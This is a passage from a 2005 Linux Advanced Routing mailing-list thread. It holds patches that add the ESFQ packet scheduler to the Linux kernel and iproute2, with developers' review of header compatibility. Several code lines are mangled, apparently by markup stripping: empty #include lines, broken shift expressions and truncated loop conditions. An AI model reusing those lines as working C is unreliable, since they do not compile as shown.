-133,6 +140,7 @@ > __u32 limit; /* Maximal packets in queue */ > unsigned divisor; /* Hash divisor */ > unsigned flows; /* Maximal number of flows */ > + unsigned hash_kind; /* Hash function to use for flow identification */ > }; > > /* > @@ -142,6 +150,8 @@ > * > * The only reason for this is efficiency, it is possible > * to change these parameters in compile time. > + * > + * If you need to play with this values use esfq > */ > > /* RED section */ > diff -urN iproute2-2.6.9.orig/tc/Makefile iproute2-2.6.9/tc/Makefile > --- iproute2-2.6.9.orig/tc/Makefile 2004-10-19 21:49:02.000000000 +0100 > +++ iproute2-2.6.9/tc/Makefile 2005-01-11 11:46:45.396401144 +0000 > @@ -6,6 +6,7 @@ > TCMODULES := > TCMODULES += q_fifo.o > TCMODULES += q_sfq.o > +TCMODULES += q_esfq.o > TCMODULES += q_red.o > TCMODULES += q_prio.o > TCMODULES += q_tbf.o > diff -urN iproute2-2.6.9.orig/tc/q_esfq.c iproute2-2.6.9/tc/q_esfq.c > --- iproute2-2.6.9.orig/tc/q_esfq.c 1970-01-01 01:00:00.000000000 +0100 > +++ iproute2-2.6.9/tc/q_esfq.c 2005-01-11 11:47:29.424707824 +0000 > @@ -0,0 +1,168 @@ > +/* > + * q_esfq.c ESFQ. > + * > + * This program is free software; you can redistribute it and/or > + * modify it under the terms of the GNU General Public License > + * as published by the Free Software Foundation; either version > + * 2 of the License, or (at your option) any later version. > + * > + * Authors: Alexey Kuznetsov, > + * > + * Changes: Alexander Atanasov, > + * Added depth,limit,divisor,hash_kind options. > + */ > + > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > + > +#include "utils.h" > +#include "tc_util.h" > + > +static void explain(void) > +{ > + fprintf(stderr, "Usage: ... esfq [ perturb SECS ] [ quantum BYTES ] [ depth FLOWS ]\n\t[ divisor HASHBITS ] [ limit PKTS ] [ hash HASHTYPE]\n"); > + fprintf(stderr,"Where: \n"); > + fprintf(stderr,"HASHTYPE := { classic | src | dst }\n"); > +} > + > +#define usage() return(-1) > + > +static int esfq_parse_opt(struct qdisc_util *qu, int argc, char **argv, struct nlmsghdr *n) > +{ > + int ok=0; > + struct tc_sfq_qopt opt; > + > + memset(&opt, 0, sizeof(opt)); > + > + opt.hash_kind= TCA_SFQ_HASH_CLASSIC; > + > + while (argc > 0) { > + if (strcmp(*argv, "quantum") == 0) { > + NEXT_ARG(); > + if (get_size(&opt.quantum, *argv)) { > + fprintf(stderr, "Illegal \"quantum\"\n"); > + return -1; > + } > + ok++; > + } else if (strcmp(*argv, "perturb") == 0) { > + NEXT_ARG(); > + if (get_integer(&opt.perturb_period, *argv, 0)) { > + fprintf(stderr, "Illegal \"perturb\"\n"); > + return -1; > + } > + ok++; > + } else if (strcmp(*argv, "depth") == 0) { > + NEXT_ARG(); > + if (get_integer(&opt.flows, *argv, 0)) { > + fprintf(stderr, "Illegal \"depth\"\n"); > + return -1; > + } > + ok++; > + } else if (strcmp(*argv, "divisor") == 0) { > + NEXT_ARG(); > + if (get_integer(&opt.divisor, *argv, 0)) { > + fprintf(stderr, "Illegal \"divisor\"\n"); > + return -1; > + } > + if(opt.divisor >= 15) { > + fprintf(stderr, "Illegal \"divisor\" must be < 15\n"); > + return -1; > + } > + opt.divisor=pow(2,opt.divisor); > + ok++; > + } else if (strcmp(*argv, "limit") == 0) { > + NEXT_ARG(); > + if (get_integer(&opt.limit, *argv, 0)) { > + fprintf(stderr, "Illegal \"limit\"\n"); > + return -1; > + } > + ok++; > + } else if (strcmp(*argv, "hash") == 0) { > + NEXT_ARG(); > + if(strcmp(*argv,"classic") == 0) { > + opt.hash_kind= TCA_SFQ_HASH_CLASSIC; > + } else > + if(strcmp(*argv,"dst") == 0) { > + opt.hash_kind= TCA_SFQ_HASH_DST; > + } else > + if(strcmp(*argv,"src") == 0) { > + opt.hash_kind= TCA_SFQ_HASH_SRC; > + } else { > + fprintf(stderr, "Illegal \"hash\"\n"); > + explain(); > + return -1; > + } > + ok++; > + } else if (strcmp(*argv, "help") == 0) { > + explain(); > + return -1; > + } else { > + fprintf(stderr, "What is \"%s\"?\n", *argv); > + explain(); > + return -1; > + } > + argc--; argv++; > + } > + > + if (ok) > + addattr_l(n, 1024, TCA_OPTIONS, &opt, sizeof(opt)); > + return 0; > +} > + > +static int esfq_print_opt(struct qdisc_util *qu, FILE *f, struct rtattr *opt) > +{ > + struct tc_sfq_qopt *qopt; > + SPRINT_BUF(b1); > + > + if (opt == NULL) > + return 0; > + > + if (RTA_PAYLOAD(opt) < sizeof(*qopt)) > + return -1; > + qopt = RTA_DATA(opt); > + fprintf(f, "quantum %s ", sprint_size(qopt->quantum, b1)); > + if (show_details) { > + fprintf(f, "limit %up flows %u/%u ", > + qopt->limit, qopt->flows, qopt->divisor); > + } > + if (qopt->perturb_period) > + fprintf(f, "perturb %dsec ", qopt->perturb_period); > + > + fprintf(f,"hash: "); > + switch(qopt->hash_kind) > + { > + case TCA_SFQ_HASH_CLASSIC: > + fprintf(f,"classic"); > + break; > + case TCA_SFQ_HASH_DST: > + fprintf(f,"dst"); > + break; > + case TCA_SFQ_HASH_SRC: > + fprintf(f,"src"); > + break; > + default: > + fprintf(f,"Unknown"); > + } > + return 0; > +} > + > +static int esfq_print_xstats(struct qdisc_util *qu, FILE *f, struct rtattr *xstats) > +{ > + return 0; > +} > + > + > +struct qdisc_util esfq_qdisc_util = { > + .id = "esfq", > + .parse_qopt = esfq_parse_opt, > + .print_qopt = esfq_print_opt, > + .print_xstats = esfq_print_xstats, > +}; > > > ------------------------------------------------------------------------ > > diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h > --- linux-2.6.10.orig/include/linux/pkt_sched.h Fri Dec 24 21:35:23 2004 > +++ linux-2.6.10/include/linux/pkt_sched.h Mon Jan 10 15:32:43 2005 > @@ -129,6 +129,13 @@ > > /* SFQ section */ > > +enum > +{ > + TCA_SFQ_HASH_CLASSIC, > + TCA_SFQ_HASH_DST, > + TCA_SFQ_HASH_SRC, > +}; > + > struct tc_sfq_qopt > { > unsigned quantum; /* Bytes per round allocated to flow */ > @@ -136,6 +143,7 @@ > __u32 limit; /* Maximal packets in queue */ > unsigned divisor; /* Hash divisor */ > unsigned flows; /* Maximal number of flows */ > + unsigned hash_kind; /* Hash function to use for flow identification */ > }; > > /* > @@ -145,6 +153,8 @@ > * > * The only reason for this is efficiency, it is possible > * to change these parameters in compile time. > + * > + * If you need to play with this values use esfq. > */ > > /* RED section */ > diff -urN linux-2.6.10.orig/net/sched/Kconfig linux-2.6.10/net/sched/Kconfig > --- linux-2.6.10.orig/net/sched/Kconfig Fri Dec 24 21:35:27 2004 > +++ linux-2.6.10/net/sched/Kconfig Mon Jan 10 15:32:43 2005 > @@ -154,6 +154,24 @@ > To compile this code as a module, choose M here: the > module will be called sch_sfq. > > +config NET_SCH_ESFQ > + tristate "ESFQ queue" > + depends on NET_SCHED > + ---help--- > + Say Y here if you want to use the Enhanced Stochastic Fairness > + Queueing (ESFQ) packet scheduling algorithm for some of your network > + devices or as a leaf discipline for the CBQ scheduling algorithm (see > + the top of for details and references > + about the SFQ algorithm). > + > + This is an enchanced SFQ version which allows you to control the > + hardcoded values in the SFQ scheduler: queue depth, hash table size, > + queues limit. Also adds control to the hash function used to identify > + packet flows. Hash by src or dst ip and original sfq hash. > + > + To compile this code as a module, choose M here: the > + module will be called sch_esfq. > + > config NET_SCH_TEQL > tristate "TEQL queue" > depends on NET_SCHED > diff -urN linux-2.6.10.orig/net/sched/Makefile linux-2.6.10/net/sched/Makefile > --- linux-2.6.10.orig/net/sched/Makefile Fri Dec 24 21:34:45 2004 > +++ linux-2.6.10/net/sched/Makefile Mon Jan 10 15:32:43 2005 > @@ -22,6 +22,7 @@ > obj-$(CONFIG_NET_SCH_INGRESS) += sch_ingress.o > obj-$(CONFIG_NET_SCH_DSMARK) += sch_dsmark.o > obj-$(CONFIG_NET_SCH_SFQ) += sch_sfq.o > +obj-$(CONFIG_NET_SCH_ESFQ) += sch_esfq.o > obj-$(CONFIG_NET_SCH_TBF) += sch_tbf.o > obj-$(CONFIG_NET_SCH_TEQL) += sch_teql.o > obj-$(CONFIG_NET_SCH_PRIO) += sch_prio.o > diff -urN linux-2.6.10.orig/net/sched/sch_esfq.c linux-2.6.10/net/sched/sch_esfq.c > --- linux-2.6.10.orig/net/sched/sch_esfq.c Thu Jan 1 01:00:00 1970 > +++ linux-2.6.10/net/sched/sch_esfq.c Mon Jan 10 22:40:09 2005 > @@ -0,0 +1,585 @@ > +/* > + * net/sched/sch_esfq.c Extended Stochastic Fairness Queueing discipline. > + * > + * This program is free software; you can redistribute it and/or > + * modify it under the terms of the GNU General Public License > + * as published by the Free Software Foundation; either version > + * 2 of the License, or (at your option) any later version. > + * > + * Authors: Alexey Kuznetsov, > + * > + * Changes: Alexander Atanasov, > + * Added dynamic depth,limit,divisor,hash_kind options. > + * Added dst and src hashes. > + */ > + > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > + > + > +/* Stochastic Fairness Queuing algorithm. > + For more comments look at sch_sfq.c. > + The difference is that you can change limit, depth, > + hash table size and choose 3 hash types. > + > + classic: same as in sch_sfq.c > + dst: destination IP address > + src: source IP address > + > + TODO: > + make sfq_change work. > +*/ > + > + > +/* This type should contain at least SFQ_DEPTH*2 values */ > +typedef unsigned int esfq_index; > + > +struct esfq_head > +{ > + esfq_index next; > + esfq_index prev; > +}; > + > +struct esfq_sched_data > +{ > +/* Parameters */ > + int perturb_period; > + unsigned quantum; /* Allotment per round: MUST BE >= MTU */ > + int limit; > + unsigned depth; > + unsigned hash_divisor; > + unsigned hash_kind; > +/* Variables */ > + struct timer_list perturb_timer; > + int perturbation; > + esfq_index tail; /* Index of current slot in round */ > + esfq_index max_depth; /* Maximal depth */ > + > + esfq_index *ht; /* Hash table */ > + esfq_index *next; /* Active slots link */ > + short *allot; /* Current allotment per slot */ > + unsigned short *hash; /* Hash value indexed by slots */ > + struct sk_buff_head *qs; /* Slot queue */ > + struct esfq_head *dep; /* Linked list of slots, indexed by depth */ > +}; > + > +static __inline__ unsigned esfq_hash_u32(struct esfq_sched_data *q,u32 h) > +{ > + int pert = q->perturbation; > + > + if (pert) > + h = (h<>(0x1F - pert)); > + > + h = ntohl(h) * 2654435761UL; > + return h & (q->hash_divisor-1); > +} > + > +static __inline__ unsigned esfq_fold_hash_classic(struct esfq_sched_data *q, u32 h, u32 h1) > +{ > + int pert = q->perturbation; > + > + /* Have we any rotation primitives? If not, WHY? */ > + h ^= (h1<>(0x1F - pert)); > + h ^= h>>10; > + return h & (q->hash_divisor-1); > +} > + > +static unsigned esfq_hash(struct esfq_sched_data *q, struct sk_buff *skb) > +{ > + u32 h, h2; > + u32 hs; > + > + switch (skb->protocol) { > + case __constant_htons(ETH_P_IP): > + { > + struct iphdr *iph = skb->nh.iph; > + h = iph->daddr; > + hs = iph->saddr; > + h2 = hs^iph->protocol; > + if (!(iph->frag_off&htons(IP_MF|IP_OFFSET)) && > + (iph->protocol == IPPROTO_TCP || > + iph->protocol == IPPROTO_UDP || > + iph->protocol == IPPROTO_ESP)) > + h2 ^= *(((u32*)iph) + iph->ihl); > + break; > + } > + case __constant_htons(ETH_P_IPV6): > + { > + struct ipv6hdr *iph = skb->nh.ipv6h; > + h = iph->daddr.s6_addr32[3]; > + hs = iph->saddr.s6_addr32[3]; > + h2 = hs^iph->nexthdr; > + if (iph->nexthdr == IPPROTO_TCP || > + iph->nexthdr == IPPROTO_UDP || > + iph->nexthdr == IPPROTO_ESP) > + h2 ^= *(u32*)&iph[1]; > + break; > + } > + default: > + h = (u32)(unsigned long)skb->dst; > + hs = (u32)(unsigned long)skb->sk; > + h2 = hs^skb->protocol; > + } > + switch(q->hash_kind) > + { > + case TCA_SFQ_HASH_CLASSIC: > + return esfq_fold_hash_classic(q, h, h2); > + case TCA_SFQ_HASH_DST: > + return esfq_hash_u32(q,h); > + case TCA_SFQ_HASH_SRC: > + return esfq_hash_u32(q,hs); > + default: > + if (net_ratelimit()) > + printk(KERN_DEBUG "esfq unknown hash method, fallback to classic\n"); > + } > + return esfq_fold_hash_classic(q, h, h2); > +} > + > +static inline void esfq_link(struct esfq_sched_data *q, esfq_index x) > +{ > + esfq_index p, n; > + int d = q->qs[x].qlen + q->depth; > + > + p = d; > + n = q->dep[d].next; > + q->dep[x].next = n; > + q->dep[x].prev = p; > + q->dep[p].next = q->dep[n].prev = x; > +} > + > +static inline void esfq_dec(struct esfq_sched_data *q, esfq_index x) > +{ > + esfq_index p, n; > + > + n = q->dep[x].next; > + p = q->dep[x].prev; > + q->dep[p].next = n; > + q->dep[n].prev = p; > + > + if (n == p && q->max_depth == q->qs[x].qlen + 1) > + q->max_depth--; > + > + esfq_link(q, x); > +} > + > +static inline void esfq_inc(struct esfq_sched_data *q, esfq_index x) > +{ > + esfq_index p, n; > + int d; > + > + n = q->dep[x].next; > + p = q->dep[x].prev; > + q->dep[p].next = n; > + q->dep[n].prev = p; > + d = q->qs[x].qlen; > + if (q->max_depth < d) > + q->max_depth = d; > + > + esfq_link(q, x); > +} > + > +static unsigned int esfq_drop(struct Qdisc *sch) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + esfq_index d = q->max_depth; > + struct sk_buff *skb; > + unsigned int len; > + > + /* Queue is full! Find the longest slot and > + drop a packet from it */ > + > + if (d > 1) { > + esfq_index x = q->dep[d+q->depth].next; > + skb = q->qs[x].prev; > + len = skb->len; > + __skb_unlink(skb, &q->qs[x]); > + kfree_skb(skb); > + esfq_dec(q, x); > + sch->q.qlen--; > + sch->qstats.drops++; > + return len; > + } > + > + if (d == 1) { > + /* It is difficult to believe, but ALL THE SLOTS HAVE LENGTH 1. */ > + d = q->next[q->tail]; > + q->next[q->tail] = q->next[d]; > + q->allot[q->next[d]] += q->quantum; > + skb = q->qs[d].prev; > + len = skb->len; > + __skb_unlink(skb, &q->qs[d]); > + kfree_skb(skb); > + esfq_dec(q, d); > + sch->q.qlen--; > + q->ht[q->hash[d]] = q->depth; > + sch->qstats.drops++; > + return len; > + } > + > + return 0; > +} > + > +static int > +esfq_enqueue(struct sk_buff *skb, struct Qdisc* sch) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + unsigned hash = esfq_hash(q, skb); > + unsigned depth = q->depth; > + esfq_index x; > + > + x = q->ht[hash]; > + if (x == depth) { > + q->ht[hash] = x = q->dep[depth].next; > + q->hash[x] = hash; > + } > + __skb_queue_tail(&q->qs[x], skb); > + esfq_inc(q, x); > + if (q->qs[x].qlen == 1) { /* The flow is new */ > + if (q->tail == depth) { /* It is the first flow */ > + q->tail = x; > + q->next[x] = x; > + q->allot[x] = q->quantum; > + } else { > + q->next[x] = q->next[q->tail]; > + q->next[q->tail] = x; > + q->tail = x; > + } > + } > + if (++sch->q.qlen < q->limit-1) { > + sch->bstats.bytes += skb->len; > + sch->bstats.packets++; > + return 0; > + } > + > + esfq_drop(sch); > + return NET_XMIT_CN; > +} > + > +static int > +esfq_requeue(struct sk_buff *skb, struct Qdisc* sch) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + unsigned hash = esfq_hash(q, skb); > + unsigned depth = q->depth; > + esfq_index x; > + > + x = q->ht[hash]; > + if (x == depth) { > + q->ht[hash] = x = q->dep[depth].next; > + q->hash[x] = hash; > + } > + __skb_queue_head(&q->qs[x], skb); > + esfq_inc(q, x); > + if (q->qs[x].qlen == 1) { /* The flow is new */ > + if (q->tail == depth) { /* It is the first flow */ > + q->tail = x; > + q->next[x] = x; > + q->allot[x] = q->quantum; > + } else { > + q->next[x] = q->next[q->tail]; > + q->next[q->tail] = x; > + q->tail = x; > + } > + } > + if (++sch->q.qlen < q->limit - 1) { > + sch->qstats.requeues++; > + return 0; > + } > + > + sch->qstats.drops++; > + esfq_drop(sch); > + return NET_XMIT_CN; > +} > + > + > + > + > +static struct sk_buff * > +esfq_dequeue(struct Qdisc* sch) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + struct sk_buff *skb; > + unsigned depth = q->depth; > + esfq_index a, old_a; > + > + /* No active slots */ > + if (q->tail == depth) > + return NULL; > + > + a = old_a = q->next[q->tail]; > + > + /* Grab packet */ > + skb = __skb_dequeue(&q->qs[a]); > + esfq_dec(q, a); > + sch->q.qlen--; > + > + /* Is the slot empty? */ > + if (q->qs[a].qlen == 0) { > + q->ht[q->hash[a]] = depth; > + a = q->next[a]; > + if (a == old_a) { > + q->tail = depth; > + return skb; > + } > + q->next[q->tail] = a; > + q->allot[a] += q->quantum; > + } else if ((q->allot[a] -= skb->len) <= 0) { > + q->tail = a; > + a = q->next[a]; > + q->allot[a] += q->quantum; > + } > + > + return skb; > +} > + > +static void > +esfq_reset(struct Qdisc* sch) > +{ > + struct sk_buff *skb; > + > + while ((skb = esfq_dequeue(sch)) != NULL) > + kfree_skb(skb); > +} > + > +static void esfq_perturbation(unsigned long arg) > +{ > + struct Qdisc *sch = (struct Qdisc*)arg; > + struct esfq_sched_data *q = qdisc_priv(sch); > + > + q->perturbation = net_random()&0x1F; > + q->perturb_timer.expires = jiffies + q->perturb_period; > + > + if (q->perturb_period) { > + q->perturb_timer.expires = jiffies + q->perturb_period; > + add_timer(&q->perturb_timer); > + } > +} > + > +static int esfq_change(struct Qdisc *sch, struct rtattr *opt) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + struct tc_sfq_qopt *ctl = RTA_DATA(opt); > + int old_perturb = q->perturb_period; > + > + if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) > + return -EINVAL; > + > + sch_tree_lock(sch); > + q->quantum = ctl->quantum ? : psched_mtu(sch->dev); > + q->perturb_period = ctl->perturb_period*HZ; > +// q->hash_divisor = ctl->divisor; > +// q->tail = q->limit = q->depth = ctl->flows; > + > + if (ctl->limit) > + q->limit = min_t(u32, ctl->limit, q->depth); > + > + if (ctl->hash_kind) { > + q->hash_kind = ctl->hash_kind; > + if (q->hash_kind != TCA_SFQ_HASH_CLASSIC) > + q->perturb_period = 0; > + } > + > + // is sch_tree_lock enough to do this ? > + while (sch->q.qlen >= q->limit-1) > + esfq_drop(sch); > + > + if (old_perturb) > + del_timer(&q->perturb_timer); > + if (q->perturb_period) { > + q->perturb_timer.expires = jiffies + q->perturb_period; > + add_timer(&q->perturb_timer); > + } else { > + q->perturbation = 0; > + } > + sch_tree_unlock(sch); > + return 0; > +} > + > +static int esfq_init(struct Qdisc *sch, struct rtattr *opt) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + struct tc_sfq_qopt *ctl; > + esfq_index p = ~0UL/2; > + int i; > + > + if (opt && opt->rta_len < RTA_LENGTH(sizeof(*ctl))) > + return -EINVAL; > + > + init_timer(&q->perturb_timer); > + q->perturb_timer.data = (unsigned long)sch; > + q->perturb_timer.function = esfq_perturbation; > + q->perturbation = 0; > + q->hash_kind = TCA_SFQ_HASH_CLASSIC; > + q->max_depth = 0; > + if (opt == NULL) { > + q->quantum = psched_mtu(sch->dev); > + q->perturb_period = 0; > + q->hash_divisor = 1024; > + q->tail = q->limit = q->depth = 128; > + > + } else { > + ctl = RTA_DATA(opt); > + q->quantum = ctl->quantum ? : psched_mtu(sch->dev); > + q->perturb_period = ctl->perturb_period*HZ; > + q->hash_divisor = ctl->divisor ? : 1024; > + q->tail = q->limit = q->depth = ctl->flows ? : 128; > + > + if ( q->depth > p - 1 ) > + return -EINVAL; > + > + if (ctl->limit) > + q->limit = min_t(u32, ctl->limit, q->depth); > + > + if (ctl->hash_kind) { > + q->hash_kind = ctl->hash_kind; > + } > + > + if (q->perturb_period) { > + q->perturb_timer.expires = jiffies + q->perturb_period; > + add_timer(&q->perturb_timer); > + } > + } > + > + q->ht = kmalloc(q->hash_divisor*sizeof(esfq_index), GFP_KERNEL); > + if (!q->ht) > + goto err_case; > + > + q->dep = kmalloc((1+q->depth*2)*sizeof(struct esfq_head), GFP_KERNEL); > + if (!q->dep) > + goto err_case; > + q->next = kmalloc(q->depth*sizeof(esfq_index), GFP_KERNEL); > + if (!q->next) > + goto err_case; > + > + q->allot = kmalloc(q->depth*sizeof(short), GFP_KERNEL); > + if (!q->allot) > + goto err_case; > + q->hash = kmalloc(q->depth*sizeof(unsigned short), GFP_KERNEL); > + if (!q->hash) > + goto err_case; > + q->qs = kmalloc(q->depth*sizeof(struct sk_buff_head), GFP_KERNEL); > + if (!q->qs) > + goto err_case; > + > + for (i=0; i< q->hash_divisor; i++) > + q->ht[i] = q->depth; > + for (i=0; idepth; i++) { > + skb_queue_head_init(&q->qs[i]); > + q->dep[i+q->depth].next = i+q->depth; > + q->dep[i+q->depth].prev = i+q->depth; > + } > + > + for (i=0; idepth; i++) > + esfq_link(q, i); > + return 0; > +err_case: > + if (q->ht) > + kfree(q->ht); > + if (q->dep) > + kfree(q->dep); > + if (q->next) > + kfree(q->next); > + if (q->allot) > + kfree(q->allot); > + if (q->hash) > + kfree(q->hash); > + if (q->qs) > + kfree(q->qs); > + return -ENOBUFS; > +} > + > +static void esfq_destroy(struct Qdisc *sch) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + del_timer(&q->perturb_timer); > + if(q->ht) > + kfree(q->ht); > + if(q->dep) > + kfree(q->dep); > + if(q->next) > + kfree(q->next); > + if(q->allot) > + kfree(q->allot); > + if(q->hash) > + kfree(q->hash); > + if(q->qs) > + kfree(q->qs); > +} > + > +static int esfq_dump(struct Qdisc *sch, struct sk_buff *skb) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + unsigned char *b = skb->tail; > + struct tc_sfq_qopt opt; > + > + opt.quantum = q->quantum; > + opt.perturb_period = q->perturb_period/HZ; > + > + opt.limit = q->limit; > + opt.divisor = q->hash_divisor; > + opt.flows = q->depth; > + opt.hash_kind = q->hash_kind; > + > + RTA_PUT(skb, TCA_OPTIONS, sizeof(opt), &opt); > + > + return skb->len; > + > +rtattr_failure: > + skb_trim(skb, b - skb->data); > + return -1; > +} > + > +static struct Qdisc_ops esfq_qdisc_ops = > +{ > + .next = NULL, > + .cl_ops = NULL, > + .id = "esfq", > + .priv_size = sizeof(struct esfq_sched_data), > + .enqueue = esfq_enqueue, > + .dequeue = esfq_dequeue, > + .requeue = esfq_requeue, > + .drop = esfq_drop, > + .init = esfq_init, > + .reset = esfq_reset, > + .destroy = esfq_destroy, > + .change = NULL, /* esfq_change - needs more work */ > + .dump = esfq_dump, > + .owner = THIS_MODULE, > +}; > + > +static int __init esfq_module_init(void) > +{ > + return register_qdisc(&esfq_qdisc_ops); > +} > +static void __exit esfq_module_exit(void) > +{ > + unregister_qdisc(&esfq_qdisc_ops); > +} > +module_init(esfq_module_init) > +module_exit(esfq_module_exit) > +MODULE_LICENSE("GPL"); > > > ------------------------------------------------------------------------ > > Submitted By: Jeremy Utley > Date: 2004-11-04 > Initial Package Version: 2.6.9-041019 > Upstream Status - Not submitted - LFS Specific > Origin: Based on inital work by Jim Gifford, ported to apply to the latest version > Description: Disables compilation of the arpd program, which requres Berkley DB. > > > diff -Naur iproute2-2.6.9/misc/Makefile iproute2-2.6.9-new/misc/Makefile > --- iproute2-2.6.9/misc/Makefile 2004-10-19 20:49:02.000000000 +0000 > +++ iproute2-2.6.9-new/misc/Makefile 2004-11-04 19:14:43.704002010 +0000 > @@ -1,7 +1,7 @@ > SSOBJ=ss.o ssfilter.o > LNSTATOBJ=lnstat.o lnstat_util.o > > -TARGETS=ss nstat ifstat rtacct arpd lnstat > +TARGETS=ss nstat ifstat rtacct lnstat > > include ../Config > > @@ -18,9 +18,6 @@ > rtacct: rtacct.c > $(CC) $(CFLAGS) $(LDFLAGS) -o rtacct rtacct.c $(LIBNETLINK) -lm > > -arpd: arpd.c > - $(CC) $(CFLAGS) -I$(DBM_INCLUDE) $(LDFLAGS) -o arpd arpd.c $(LIBNETLINK) -ldb -lpthread > - > ssfilter.c: ssfilter.y > bison ssfilter.y -o ssfilter.c > From tgraf@suug.ch Tue Jan 11 20:38:10 2005 From: tgraf@suug.ch (Thomas Graf) Date: Tue, 11 Jan 2005 21:38:10 +0100 Subject: [LARTC] ESFQ? In-Reply-To: <41E3F088.6060708@dsl.pipex.com> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> <41E3F088.6060708@dsl.pipex.com> Message-ID: <20050111203810.GE26856@postel.suug.ch> * Andy Furniss <41E3F088.6060708@dsl.pipex.com> 2005-01-11 15:28 > diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h > @@ -136,6 +143,7 @@ > __u32 limit; /* Maximal packets in queue */ > unsigned divisor; /* Hash divisor */ > unsigned flows; /* Maximal number of flows */ > + unsigned hash_kind; /* Hash function to use for flow identification */ > }; This breaks compatibility to older iproute2 versions compiled with older header versions (not including the additional 4 octets). sch_sfq.c: if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) return -EINVAL; > +static int esfq_change(struct Qdisc *sch, struct rtattr *opt) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + struct tc_sfq_qopt *ctl = RTA_DATA(opt); > + int old_perturb = q->perturb_period; > + > + if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) > + return -EINVAL; > + > + sch_tree_lock(sch); > + q->quantum = ctl->quantum ? : psched_mtu(sch->dev); > + q->perturb_period = ctl->perturb_period*HZ; > +// q->hash_divisor = ctl->divisor; > +// q->tail = q->limit = q->depth = ctl->flows; > + > + if (ctl->limit) > + q->limit = min_t(u32, ctl->limit, q->depth); > + > + if (ctl->hash_kind) { > + q->hash_kind = ctl->hash_kind; > + if (q->hash_kind != TCA_SFQ_HASH_CLASSIC) > + q->perturb_period = 0; > + } > + > + // is sch_tree_lock enough to do this ? > + while (sch->q.qlen >= q->limit-1) > + esfq_drop(sch); > + > + if (old_perturb) > + del_timer(&q->perturb_timer); > + if (q->perturb_period) { > + q->perturb_timer.expires = jiffies + q->perturb_period; > + add_timer(&q->perturb_timer); > + } else { > + q->perturbation = 0; > + } > + sch_tree_unlock(sch); > + return 0; > +} Must be changed to use tcf_exts and ematch api once those patches are merged. I will take care of this. I'll have a closer look later on this week. From andy.furniss@dsl.pipex.com Tue Jan 11 23:06:27 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 11 Jan 2005 23:06:27 +0000 Subject: [LARTC] ESFQ? In-Reply-To: <20050111203810.GE26856@postel.suug.ch> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> <41E3F088.6060708@dsl.pipex.com> <20050111203810.GE26856@postel.suug.ch> Message-ID: <41E45BF3.1040208@dsl.pipex.com> Thomas Graf wrote: > * Andy Furniss <41E3F088.6060708@dsl.pipex.com> 2005-01-11 15:28 > >>diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h >>@@ -136,6 +143,7 @@ >> __u32 limit; /* Maximal packets in queue */ >> unsigned divisor; /* Hash divisor */ >> unsigned flows; /* Maximal number of flows */ >>+ unsigned hash_kind; /* Hash function to use for flow identification */ >> }; > > > This breaks compatibility to older iproute2 versions > compiled with older header versions (not including > the additional 4 octets). sch_sfq.c: > > if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) > return -EINVAL; I did wonder if it could just come out now that iproute2 uses its own pkt_sched.h. Just to be sure I understand - it's a risk that always existed eg. before Stephen maintained iproute2, when it compiled against kernel headers. If I patched kernel and failed to compile new tc/had old tc ahead in path etc. then sfq would be broken. So if you patch make sure you build and use new tc do tc -V / check you don't have an old one in /sbin as iproute2's make install uses /usr/sbin by default. > >>+static int esfq_change(struct Qdisc *sch, struct rtattr *opt) >>+{ >>+ struct esfq_sched_data *q = qdisc_priv(sch); >>+ struct tc_sfq_qopt *ctl = RTA_DATA(opt); >>+ int old_perturb = q->perturb_period; >>+ >>+ if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) >>+ return -EINVAL; >>+ >>+ sch_tree_lock(sch); >>+ q->quantum = ctl->quantum ? : psched_mtu(sch->dev); >>+ q->perturb_period = ctl->perturb_period*HZ; >>+// q->hash_divisor = ctl->divisor; >>+// q->tail = q->limit = q->depth = ctl->flows; >>+ >>+ if (ctl->limit) >>+ q->limit = min_t(u32, ctl->limit, q->depth); >>+ >>+ if (ctl->hash_kind) { >>+ q->hash_kind = ctl->hash_kind; >>+ if (q->hash_kind != TCA_SFQ_HASH_CLASSIC) >>+ q->perturb_period = 0; >>+ } >>+ >>+ // is sch_tree_lock enough to do this ? >>+ while (sch->q.qlen >= q->limit-1) >>+ esfq_drop(sch); >>+ >>+ if (old_perturb) >>+ del_timer(&q->perturb_timer); >>+ if (q->perturb_period) { >>+ q->perturb_timer.expires = jiffies + q->perturb_period; >>+ add_timer(&q->perturb_timer); >>+ } else { >>+ q->perturbation = 0; >>+ } >>+ sch_tree_unlock(sch); >>+ return 0; >>+} > > > Must be changed to use tcf_exts and ematch api once those patches > are merged. I will take care of this. > > I'll have a closer look later on this week. > Thanks. Andy. From shemminger@osdl.org Wed Jan 12 00:21:10 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Tue, 11 Jan 2005 16:21:10 -0800 Subject: [LARTC] ESFQ? In-Reply-To: <41E45BF3.1040208@dsl.pipex.com> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> 